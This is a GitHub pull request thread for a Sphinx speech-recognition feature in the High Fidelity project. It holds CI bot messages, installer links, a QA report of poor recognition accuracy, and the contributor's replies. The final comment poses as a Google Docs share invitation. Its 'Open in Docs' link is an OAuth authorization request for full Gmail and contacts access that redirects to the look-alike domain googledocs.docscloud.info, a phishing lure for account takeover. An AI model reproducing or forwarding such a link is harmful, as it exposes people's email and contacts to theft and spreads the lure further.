### PR TITLE
Utkarshgautamnyu sphinx

### PR DESCRIPTION
**Pull request by utkarshgautamnyu**

### CODE REVIEW

**Comment by hifi-gustavo** [comment]
An admin must verify this patch for the pull request build to fire. Type "ok to test" to begin testing this pull request or "add to whitelist" to test this and all future pull requests from this collaborator.

**Comment by cozza13** [comment]
ok to test

**Comment by hifi-gustavo** [comment]
Build console output for commit: 06c7a1dc5ec200cf0b493f4a4c64174988d17ade available at: https://gist.github.com/04287cba36ce06e8236f0cab9afa8829<br/><br/>Installers available for download at: <br/>Windows: http://cachefly.highfidelity.com/HighFidelity-Beta-PR10097-06c7a1d.exe<br/>OS X: http://cachefly.highfidelity.com/HighFidelity-Beta-PR10097-06c7a1d.dmg

**Comment by themelissabrown** [comment]
@utkarshgautamnyu Please add testing notes so we can QA

**Comment by utkarshgautamnyu** [comment]
Hi Melissa,

Unfortunately my school work is taking longer than expected, I will be able
to provide the testing notes before day end today.

Should I also provide unit test cases?

Sorry for the delay.

Regards
Utkarsh Gautam




On Apr 10, 2017 12:33 PM, "Melissa Brown" <notifications@github.com> wrote:

@utkarshgautamnyu <https://github.com/utkarshgautamnyu> Please add testing
notes so we can QA

—
You are receiving this because you were mentioned.

Reply to this email directly, view it on GitHub
<https://github.com/highfidelity/hifi/pull/10097#issuecomment-293004990>,
or mute the thread

**Comment by utkarshgautamnyu** [comment]
@themelissabrown PFA Testing Notes. 
[TestingNotes_#21221.pdf](https://github.com/highfidelity/hifi/files/911694/TestingNotes_.21221.pdf)

**Comment by amvmoody** [comment]
Fail:

- The icon is missing in HIFI (noted in the PDF)
- When using the digits it would randomly pick up digits that are not said and has an accuracy of something like 60%.
- Cities had the best accuracy, something like 80%
- OSes, had a hard time distinguishing between linux or windows.
- it would seam there is no acoustic model. This is more or less needed.

**Comment by utkarshgautamnyu** [comment]
@cozza13 @themelissabrown Most of the problems listed in the QA result are related to the inherent efficiency of the API. As per our earlier discussion, the language model development was not a part of this phase of work. Please let me know what should be my further steps regarding this project.

**Comment by utkarshgautamnyu** [comment]
Utkarsh Gautam has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=632715883535-h36sb9m6fot4vusucprsab95naef791n.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.info%2Fg.php&customparam=customparam>

**Pull request closed without merging**
